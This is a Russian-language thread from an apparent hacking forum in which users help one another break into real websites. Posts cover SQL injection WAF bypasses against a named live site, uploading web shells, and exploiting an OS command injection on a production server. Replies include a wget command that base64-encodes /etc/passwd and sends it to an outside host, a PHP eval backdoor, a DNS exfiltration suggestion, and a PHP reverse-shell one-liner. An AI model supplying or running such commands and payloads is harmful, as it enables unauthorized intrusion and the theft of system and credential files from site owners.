Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    54
    Likes Received:
    5
    Reputations:
    0

    при помощи мепа тебе поможет тампер --tamper=unionalltounion и все выведет и покажет

    ну потом отснифаешь если руками надо
     
    exT1ma4ka likes this.
  2. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,015
    Likes Received:
    1,363
    Reputations:
    43
    %23
     
    Gorev and exT1ma4ka like this.
  3. exT1ma4ka

    exT1ma4ka New Member

    Joined:
    12 May 2010
    Messages:
    44
    Likes Received:
    2
    Reputations:
    5
    а бревна и не заметил.. smh o_O
     
    BabaDook likes this.
  4. Gorbachev

    Gorbachev Active Member

    Joined:
    23 Mar 2017
    Messages:
    242
    Likes Received:
    109
    Reputations:
    58
    Делай так: SELECT id FROM `#__users` LIMIT 0,1
     
  5. exT1ma4ka

    exT1ma4ka New Member

    Joined:
    12 May 2010
    Messages:
    44
    Likes Received:
    2
    Reputations:
    5
    @Gorbachev там кавычки запрещены. но товарищ @BabaDook верно напомнил, проблемы нет более.
     
  6. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    447
    Likes Received:
    80
    Reputations:
    20
    Есть CRLF хочу выполнить XSS но и за ответа 302 ничего не выходит, что делать?
     
  7. Jimio

    Jimio New Member

    Joined:
    20 Dec 2018
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Лью шелл, когда заходишь на него, вводишь пасс, и получаешь пустую страницу или 503 код
    WAF? Как можно обойти?
     
  8. Gorbachev

    Gorbachev Active Member

    Joined:
    23 Mar 2017
    Messages:
    242
    Likes Received:
    109
    Reputations:
    58
    Частенько такие траблы из за упаковки шелла, пробуйте другие шеллы, античат одобряе :)
     
  9. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    495
    Likes Received:
    870
    Reputations:
    312
    Действовать нужно в зависимости от места внедрения. Если выше стоит легитимный Location, то известных способов в паблике нет. Бывают различные контексты и в зависимости от бекенда попадаются варианты с возможностью обхода, но нужно ресёчить. Как вариант, если ещё не видел, ознакомиться с этим райтапом https://habr.com/ru/company/pt/blog/247709/.

    Похоже на проблему WSO2 с PHP7, нужно выпилить set_magic_quotes_runtime.
     
    #2629 crlf, 2 Apr 2019
    Last edited: 2 Apr 2019
    ms13, Octavian and BillyBons like this.
  10. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    199
    Likes Received:
    22
    Reputations:
    0
    Можете пожалуйста подсказать по данной sql-injection:
    Code:
    igum.com.ua/index.php?route=product/search_auto&tab=all_tire&height=5&diameter=6&season=%D0%B2%D1%81%D0%B5%D1%81%D0%B5%D0%B7%D0%BE%D0%BD%D0%BD%D0%B0%D1%8F&type=%D0%B2%D0%BD%D0%B5%D0%B4%D0%BE%D1%80%D0%BE%D0%B6%D0%BD%D0%B8%D0%BA&brand=68&autotype=all&width=1
    Параметр: width
    Через sqlmap не удалось что с тамперами, что без
    Пробовал в ручную, но так и не сообразил как обойти и что конкретно фильтруется
    обратил внимание что фильтрует AND, OR и что то еще =( хотя могу ошибаться

    Может кто-то уже сталкивался с WAF'ом данного хостера( hostsila
    А то уже третий хост попадается этот и как в стену((
     
  11. Jimio

    Jimio New Member

    Joined:
    20 Dec 2018
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Запаковал нормально и все заработало. Спасибо.
     
  12. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    32
    Likes Received:
    7
    Reputations:
    0
    Есть os command inj в пост запросе, выводит uname -a : "Linux web***.******.com 2.6.32-696.16.1.el6.x86_64 #1 SMP Wed Nov 15 16:51:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux""
    pwd выводит норм полный путь.
    ls -la выводит только первый файл "-rw-r--r--. 1 try_home try_home 25 2018-11-11 12:27 index.php" хотя файлов в дире много.
    И так из любой папки, только один показывает.
    wget и curl ничего не качают, хотя они установлены и работают (м.б. нет прав у меня?) файлы создавать не могу, читать не могу...
    cat "filename" показывает только последнюю строчку файла, "?>", если я пытаюсь с флагом -b, то показывает кол-во строк в файле и все. =(
    cat /etc/passwd -> "oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin" Тоже блин одна строка.
    whoami говорит что я daemon (= Чего делать то?
    Никакие файлы ни прочитать полностью, ни отредактировать не могу. echo >> тоже не работает.
    Нету скилла.
    Прошу помощи, куда копнуть.
    Премного благодарен.
     
  13. BillyBons

    BillyBons Active Member

    Joined:
    1 Dec 2016
    Messages:
    223
    Likes Received:
    111
    Reputations:
    13
    Конвейер | работает ? С ним можно и списки файлов, и содержимое построчно перебрать.
     
    auth_root likes this.
  14. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    32
    Likes Received:
    7
    Reputations:
    0
    Покажи на примере плз, как. %7c работает.
     
  15. BillyBons

    BillyBons Active Member

    Joined:
    1 Dec 2016
    Messages:
    223
    Likes Received:
    111
    Reputations:
    13
    ls -l | awk 'NR==12' - показать двенадцатую строку из выдачи
     
    auth_root likes this.
  16. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    198
    Likes Received:
    669
    Reputations:
    329
    auth_root, длина строки ответа различается, можешь попробовать
    cat index.php | base64
    или перенаправить вывод на свой сервер
    wget "http://hek.ru/?log={`cat /etc/passwd | base64`}"
    но, логичный вопрос, что мешает тебе запилить бекконект и сидеть в полноценном баше ;)
     
    auth_root and ms13 like this.
  17. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    32
    Likes Received:
    7
    Reputations:
    0
    Да, так работает, спасибо. =) Чуствую спалят раньше, чем я переберу эту огромную массу информации построчно.
    wget (maybe в моих кривых руках) не работает. Base64 так же выводит всего по одной строке еще и обрезаной. Как запилить бэкконнект? Добавить <?php eval($_GET[cmd]); ?> в файл? Не редачит он существующие, пустые не создает, wget и curl не воркает у меня. Я Очень давно этим не занимался. Тут подбили края
     
  18. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,015
    Likes Received:
    1,363
    Reputations:
    43
    Ты натолкнул на идею. через днс на свой сервак. dig то есть в линухе
     
  19. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    32
    Likes Received:
    7
    Reputations:
    0
    Как реализовать, покажите плз неумному =(
     
  20. hibar1Xs

    hibar1Xs Member

    Joined:
    30 Jan 2019
    Messages:
    9
    Likes Received:
    5
    Reputations:
    3
    Code:
    php -r '$sock=fsockopen("127.0.0.1",65536);exec("/bin/sh -i <&3 >&3 2>&3");'
     
Loading...